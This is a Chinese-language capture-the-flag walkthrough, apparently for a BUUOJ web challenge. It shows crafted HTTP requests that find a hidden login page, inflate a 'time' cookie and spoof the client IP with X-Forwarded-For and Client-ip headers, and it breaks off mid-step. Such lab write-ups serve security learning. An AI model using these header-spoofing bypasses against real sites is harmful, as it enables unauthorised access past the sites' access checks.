进入网页发现登录页面,尝试admin登录,发现登录被拦截,说明我们无法使用admin登录,尝试其他用户名123,发现登录成功。用BurpSuite拦截没有发现什么,在登录页面尝试BurpSuite发现注释<!-- L0g1n.php -->,尝试访问L0g1n.php,在地址栏里面输入:
/L0g1n.php
一开始可能会出错,刷新一下,用BurpSuite拦截,网页提示:
Sorry, this site will be available after totally 99 years!
在请求的cookie发现time,尝试把time修改大一点,构造请求:
GET /L0g1n.php HTTP/1.1
Host: node3.buuoj.cn:25552
Cookie: PHPSESSID=vdibuf54gji7382jnlejt7lg95; time=9999999999999999999
注意cookie下面空两行。
发送后,网页提示:
Sorry, this site is only optimized for those who comes from localhost
修改请求:
GET /L0g1n.php HTTP/1.1
Host: node3.buuoj.cn:25552
Cookie: PHPSESSID=vdibuf54gji7382jnlejt7lg95; time=9999999999999999999
X-forwarded-for: 127.0.0.1
网页显示:
Do u think that I dont know X-Forwarded-For? Too young too simple sometimes naive
不能使用X-forwarded-for,修改请求:
GET /L0g1n.php HTTP/1.1
Host: node3.buuoj.cn:25552
Cookie: PHPSESSID=vdibuf54gji7382jnlejt7lg95; time=9999999999999999999
Client-ip: 127.0.0.1
网页显示:
Sorry, this site is only optimized for those who come from gem-love.com
修改请求: